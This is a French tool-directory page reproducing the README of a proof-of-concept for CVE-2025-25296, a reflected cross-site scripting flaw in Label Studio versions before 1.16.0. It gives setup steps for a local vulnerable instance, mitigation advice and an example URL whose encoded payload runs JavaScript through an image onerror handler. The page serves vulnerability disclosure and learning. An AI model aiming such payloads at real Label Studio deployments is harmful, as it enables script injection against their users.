Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25296 — Preuve de concept (POC) pour la vulnérabilité CVE-2025-25296 affectant les versions de Label Studio antérieures à 1.16.0 | Kitploit
Outils/GitHubGitHub/math-x-io/cve-2025-25296
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et Éducation
GitHubmath-x-io/cve-2025-25296

CVE-2025-25296

Preuve de concept (POC) pour la vulnérabilité CVE-2025-25296 affectant les versions de Label Studio antérieures à 1.16.0

Voir le dépôt
22il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept (POC) CVE-2025-25296

Description

Ce projet démontre une preuve de concept (POC) pour la vulnérabilité CVE-2025-25296 affectant Label Studio, un outil open-source d'annotation de données. La vulnérabilité réside dans le endpoint /projects/upload-example, qui ne parvient pas à assainir le contenu HTML fourni par l'utilisateur dans les requêtes GET. Cela permet à des attaquants d'exécuter du JavaScript arbitraire dans le navigateur de la victime, conduisant à des attaques potentielles de Cross-Site Scripting (XSS).

Détails de la vulnérabilité

  • Composant affecté : endpoint /projects/upload-example de Label Studio
  • Impact : Cross-Site Scripting (XSS)
  • Cause racine : Assainissement incorrect du contenu HTML fourni par l'utilisateur dans les requêtes GET
  • Exploitation : Création d'une URL malveillante contenant une configuration de label XML spécialement formatée avec du JavaScript intégré
  • Atténuation : Mettre à jour Label Studio vers la version 1.16.0 ou ultérieure

Contournement

Comme contournement temporaire :

  1. Évitez d'utiliser le endpoint /projects/upload-example avec des requêtes GET.
  2. Privilégiez les requêtes POST pour téléverser les configurations.

Prérequis

  • Python 3.x
  • Docker
  • Paquets Python requis (installés via pip à l'aide de setup.sh)

Fichiers

  • poc.py : Script Python pour exploiter la vulnérabilité et démontrer l'attaque XSS.
  • setup.sh : Script pour configurer l'environnement vulnérable à l'aide de Docker.

Instructions de configuration

  1. Clonez ce dépôt :

    root@kitploit:~
    git clone CVE-2025-25296-POC
    cd CVE-2025-25296-POC
    
  2. Exécutez le script de configuration :

    root@kitploit:~
    chmod +x setup.sh
    ./setup.sh
    
  3. Le script de configuration va :

    • Vérifier l'installation de Docker.
    • Installer les paquets Python requis.
    • Télécharger l'image Docker vulnérable de Label Studio (1.15.0).
    • Exécuter l'instance vulnérable de Label Studio sur localhost:8080.
    • Créer un compte sur http://localhost:8080

Exploitation

  1. Exécutez le script d'exploitation :

    root@kitploit:~
    python poc.py
    
  2. Le script va :

    • Envoyer une requête GET spécialement conçue au endpoint vulnérable /projects/upload-example.
    • Afficher une URL contenant la charge utile.
  3. Ouvrez l'URL fournie dans un navigateur web pour observer l'alerte XSS déclenchée par la charge utile.

Exemple de sortie

root@kitploit:~
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E

Recommandations d'atténuation

Pour atténuer cette vulnérabilité :

  1. Mettez à jour Label Studio vers la version 1.16.0 ou ultérieure.
  2. Activez une politique de sécurité du contenu (CSP) stricte pour bloquer l'exécution de scripts.

Avertissement

Ce projet est destiné uniquement à des fins éducatives et de recherche. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite. Toute utilisation non autorisée de cet outil peut enfreindre les lois applicables.

Références

  • Dépôt GitHub de Label Studio
  • Détails de la CVE-2025-25296
Télécharger l’outil